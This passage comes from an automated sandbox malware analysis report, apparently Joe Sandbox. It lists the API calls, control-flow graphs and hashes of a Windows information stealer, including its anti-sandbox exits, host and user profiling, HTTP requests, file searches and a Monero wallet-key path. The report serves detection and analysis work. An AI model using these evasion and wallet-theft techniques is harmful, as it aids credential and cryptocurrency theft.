                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2931873225-0
                                  • Opcode ID: 5f636fc2b208d53d53bf2304e6877928afe628fa7372581718ef31843060f860
                                  • Instruction ID: cf704f6967340797bf9caf3e06454f7233708775cff4ef47f973fbdc01b08a18
                                  • Opcode Fuzzy Hash: 5f636fc2b208d53d53bf2304e6877928afe628fa7372581718ef31843060f860
                                  • Instruction Fuzzy Hash: B1313E7194020AAAEB44FBF0DC5EBEE7F78FF84349F104518F602A2182DF746945C6A6
                                  Function 00546AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 546af3 1437 546b0a 1436->1437 1439 546b0c-546b22 call 546920 call 545b10 CloseHandle ExitProcess 1437->1439 1440 546aba-546ad7 call 54aad0 OpenEventA 1437->1440 1446 546af5-546b04 CloseHandle Sleep 1440->1446 1447 546ad9-546af1 call 54aad0 CreateEventA 1440->1447 1446->1437 1447->1439
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011F92A8,?,0055110C,?,00000000,?,00551110,?,00000000,00550AEF), ref: 00546ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00546AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00546AF9
                                  • Sleep.KERNEL32(00001770), ref: 00546B04
                                  • CloseHandle.KERNEL32(?,00000000,?,011F92A8,?,0055110C,?,00000000,?,00551110,?,00000000,00550AEF), ref: 00546B1A
                                  • ExitProcess.KERNEL32 ref: 00546B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 1c6eca9f2174af96806c1b64ba5939505bf80724910f60ea23051897c7e1a35e
                                  • Instruction ID: 1a71f80ffe0bbb8efe26a0fdd06ec431d5fa2f1982a73414ecc7b5cc20fc46d3
                                  • Opcode Fuzzy Hash: 1c6eca9f2174af96806c1b64ba5939505bf80724910f60ea23051897c7e1a35e
                                  • Instruction Fuzzy Hash: DDF03A7094021AABF700ABA09C0ABFD7E74FB45749F108914B516A11C1DBB45580D69B
                                  Function 005347B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00534839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00534849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: fc75ea9c42582ab13e6fdff2300521862e206f77d65cc7822c12b440567a0bcc
                                  • Instruction ID: 5899b9830b821d44a9a0783a75b1251f2bf759fbd8a01d6875aa04637f62c4d1
                                  • Opcode Fuzzy Hash: fc75ea9c42582ab13e6fdff2300521862e206f77d65cc7822c12b440567a0bcc
                                  • Instruction Fuzzy Hash: A0214FB1D00209ABEF14DFA4E849ADE7B75FB44324F108625F919A72C1EB706A05CF81
                                  Function 005451F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 00536280: InternetOpenA.WININET(00550DFE,00000001,00000000,00000000,00000000), ref: 005362E1
                                    • Part of subcall function 00536280: StrCmpCA.SHLWAPI(?,011FE878), ref: 00536303
                                    • Part of subcall function 00536280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00536335
                                    • Part of subcall function 00536280: HttpOpenRequestA.WININET(00000000,GET,?,011FE158,00000000,00000000,00400100,00000000), ref: 00536385
                                    • Part of subcall function 00536280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005363BF
                                    • Part of subcall function 00536280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005363D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00545228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: f28a619b568242368b6eeb2c23dde4374db4737b1db3f643c928767c2fad3c0a
                                  • Instruction ID: 4bc70542ccc2365e46e610cd7e962659a7131a1f575417b396e22e0390aea1bf
                                  • Opcode Fuzzy Hash: f28a619b568242368b6eeb2c23dde4374db4737b1db3f643c928767c2fad3c0a
                                  • Instruction Fuzzy Hash: D7112130944549A7EB54FF70DD5AAED7B38FF90308F404558F80A47192EF306B05CA91
                                  Function 00531220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1493 531220-531247 call 5489b0 GlobalMemoryStatusEx 1496 531273-53127a 1493->1496 1497 531249-531271 call 54da00 * 2 1493->1497 1499 531281-531285 1496->1499 1497->1499 1501 531287 1499->1501 1502 53129a-53129d 1499->1502 1503 531292-531294 ExitProcess 1501->1503 1504 531289-531290 1501->1504 1504->1502 1504->1503
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0053123E
                                  • ExitProcess.KERNEL32 ref: 00531294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 6156b65e5fdb7a907204d93c16197f6c6f8988b8b40b316d25ed330e13e22d81
                                  • Instruction ID: a603c05b8a2d266bc040d5ff3a3cdb57fb372e7e6020c8e9a9def8a5d6361c1c
                                  • Opcode Fuzzy Hash: 6156b65e5fdb7a907204d93c16197f6c6f8988b8b40b316d25ed330e13e22d81
                                  • Instruction Fuzzy Hash: 81014BB0940308BAEB10EBE1CC49BAEBB78BB44705F208048F705B6281D67455418B9D
                                  Function 005478E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00547917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0054792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: f69e4cd5c155e4788bf99405fe38b4d79901b0c3a0a4bded55a373ae031b1c63
                                  • Instruction ID: fe49038ada55ee0120a3333b116c6e8617b8b3286d8bf452717466fbfd030279
                                  • Opcode Fuzzy Hash: f69e4cd5c155e4788bf99405fe38b4d79901b0c3a0a4bded55a373ae031b1c63
                                  • Instruction Fuzzy Hash: 490186B1A04208EBDB04DF94DD45BAEBFB8F744B65F10425AF945E3280D37859448BA6
                                  Function 00531110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0053112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00531132
                                  • ExitProcess.KERNEL32 ref: 00531143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 68779da8ea338f576b5bba3b8e02745f78aac61ffc6610b66606db25de2b53d6
                                  • Instruction ID: 04701220fe59c6fc6af349783f36280caa4aab24f16184f7f5a767b738e30ece
                                  • Opcode Fuzzy Hash: 68779da8ea338f576b5bba3b8e02745f78aac61ffc6610b66606db25de2b53d6
                                  • Instruction Fuzzy Hash: 4AE0E670945308FBF7146BB09D0EB4D7B78AB44B42F104054F70D761D0D6B92651979E
                                  Function 005310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005310B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005310F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 2ff5e44a13d7da8dec36633a3b9387c24651d4bd867de47c004a7a80faa3aba0
                                  • Instruction ID: edd37dabcb5afd335c021fb468bc31f751ade9493802d2a4bfbffa8b1a066c2b
                                  • Opcode Fuzzy Hash: 2ff5e44a13d7da8dec36633a3b9387c24651d4bd867de47c004a7a80faa3aba0
                                  • Instruction Fuzzy Hash: 87F0E2B1641208BBE7189AB4AC4DFBEBBE8E705B55F304448F504E7280D5719F40CAA9
                                  Function 00531190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547910
                                    • Part of subcall function 005478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00547917
                                    • Part of subcall function 005478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0054792F
                                    • Part of subcall function 00547850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005311B7), ref: 00547880
                                    • Part of subcall function 00547850: RtlAllocateHeap.NTDLL(00000000), ref: 00547887
                                    • Part of subcall function 00547850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0054789F
                                  • ExitProcess.KERNEL32 ref: 005311C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: 2d627969e3d7e9c142820affb40597ca4c4381429b833d814d1c65b495942841
                                  • Instruction ID: f3cd6c70de3de9396e7399931cc1a1b825b06792a882919d2b5b484d2a27f977
                                  • Opcode Fuzzy Hash: 2d627969e3d7e9c142820affb40597ca4c4381429b833d814d1c65b495942841
                                  • Instruction Fuzzy Hash: C6E012B591430763DA0077B1AC0EBAE3B9C7B9478EF044824FA09D2502FA69E850C66E

                                  Non-executed Functions

                                  Function 005438B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 005438CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 005438E3
                                  • lstrcat.KERNEL32(?,?), ref: 00543935
                                  • StrCmpCA.SHLWAPI(?,00550F70), ref: 00543947
                                  • StrCmpCA.SHLWAPI(?,00550F74), ref: 0054395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00543C67
                                  • FindClose.KERNEL32(000000FF), ref: 00543C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 7f68aa63316d2808875846c9586132bb9175aebed67b77b3802073a004178e59
                                  • Instruction ID: 14ddb23d818363e8ffd554825055e62df0cff1e566d9b291b1e430278c48f5aa
                                  • Opcode Fuzzy Hash: 7f68aa63316d2808875846c9586132bb9175aebed67b77b3802073a004178e59
                                  • Instruction Fuzzy Hash: 32A16471900219ABDB24DF64DC89FFE7778FF84305F048588A50D96151EB749B84CF62
                                  Function 0053BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
